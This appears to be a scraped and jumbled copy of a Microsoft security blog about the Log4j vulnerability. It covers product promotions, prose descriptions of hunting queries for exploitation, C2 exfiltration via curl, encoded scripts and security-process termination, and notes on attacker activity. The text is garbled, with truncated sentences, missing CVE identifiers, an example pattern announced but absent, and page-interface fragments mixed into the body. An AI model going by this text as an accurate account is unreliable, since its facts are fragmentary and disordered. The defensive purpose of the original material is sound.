Microsoft threat research and response

Featured image for Structured threat hunting: One way Microsoft Threat Experts prioritizes customer defense. Our approach to threat hunting is designed to evaluate impact and escalate potential threats for investigation, based on how damaging the potential threat would be. It is also designed for speed: due to the highly time-sensitive nature of the threat response, the most dangerous potential threats are analyzed first.

Featured image for Join us at InfoSec Jupyterthon Register now. Get leading integrated security tools Prevent, detect, and respond to attacks with built-in unified experiences and end-to-end XDR capabilities.

Empower rapid response Help your security operations team resolve threats faster with AI, automation, and expertise. Microsoft Sentinel. Learn more about Microsoft Sentinel.

Microsoft Defender. Learn more about Microsoft Defender. Microsoft Defender for Cloud. Learn more about Microsoft Defender for Cloud. Microsoft Defender Prevent and detect attacks across your identities, endpoints, apps, email, data, and cloud apps with XDR capabilities. View full size. More about this diagram. Get started. Close dialog Modal dialog. It surfaces exploitation but may surface legitimate behavior in some environments.

These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application. This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure.

Microsoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network example below. Microsoft Defender for IoT sensor threat intelligence update. Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, click here for more information.

Starting with sensor version Working with automatic updates reduces operational effort and ensures greater security. For more information about threat intelligence packages in Defender for IoT, please refer to the documentation. A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE vulnerability.

Log4j Vulnerability Detection solution in Microsoft Sentinel. To deploy this solution, in the Microsoft Sentinel portal, select Content hub Preview under Content Management , then search for Log4j in the search bar.

Select the Log4j vulnerability detection solution, and click Install. Learn how to centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions. Microsoft Sentinel Analytics showing detected Log4j vulnerability. Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation.

This can be verified on the main Content hub page. This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component. It returns a table of suspicious command lines. This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE involving Log4j vulnerability.

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.

If possible, it then decodes the malicious command for further analysis. This hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files.

This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network. This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE vulnerability. This query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses.

Attackers often perform such operations as seen recently to exploit the CVE vulnerability for C2 communications or exfiltration. This query uses various log sources having user agent data to look for CVE exploitation attempt based on user agent pattern. This query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability.

This query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium. Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium. For customers who have already enabled DRS 1. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

Skip to main content. An example pattern of attack would appear in a web request log with strings like the following: An attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site.

Exploitation continues on non-Microsoft hosted Minecraft servers Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. Access brokers associated with ransomware MSTIC and the Microsoft Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.

Mass scanning activity continues The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Webtoos The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities.

A note on testing services and assumed benign activity While services such as interact. Exploitation in internet-facing systems leads to ransomware As early as January 4, attackers started exploiting the CVE vulnerability in internet-facing systems running VMware Horizon.

Discovering affected components, software, and devices via a unified Log4j dashboard Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.

Threat and vulnerability management dedicated CVE dashboard Figure 3. Threat and vulnerability management finds exposed paths Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk Note: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices.

These new capabilities provide security teams with the following: View the mitigation status for each affected device. Figure 6. This feature is currently available for Windows devices only. To view the mitigation options, click on the Mitigation options button in the Log4j dashboard : You can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. Figure 7. Creating mitigation actions for exposed devices. Microsoft Defender advanced hunting Advance hunting can also surface affected software.

This managed threat hunting service provides expert-driven insights and data through these two capabilities: targeted attack notification and access to experts on demand. Discuss the eligibility requirements with your Microsoft Technical Service provider and account team before you apply to the managed threat hunting service. If you're a Microsoft Defender for Endpoint customer, you need to apply for Microsoft Threat Experts - Targeted Attack Notifications to get special insights and analysis that help identify the most critical threats in your environment so you can respond to them quickly.

Once accepted, you will get the benefits of Targeted Attack Notifications. Contact your account team or Microsoft representative to subscribe to Microsoft Threat Experts - Experts on Demand to consult with our threat experts on relevant detections and adversaries that your organization is facing. See Configure Microsoft Threat Experts capabilities for details.

Microsoft Threat Experts - Targeted attack notification provides proactive hunting for the most important threats to your network, including human adversary intrusions, hands-on-keyboard attacks, or advanced attacks like cyber-espionage.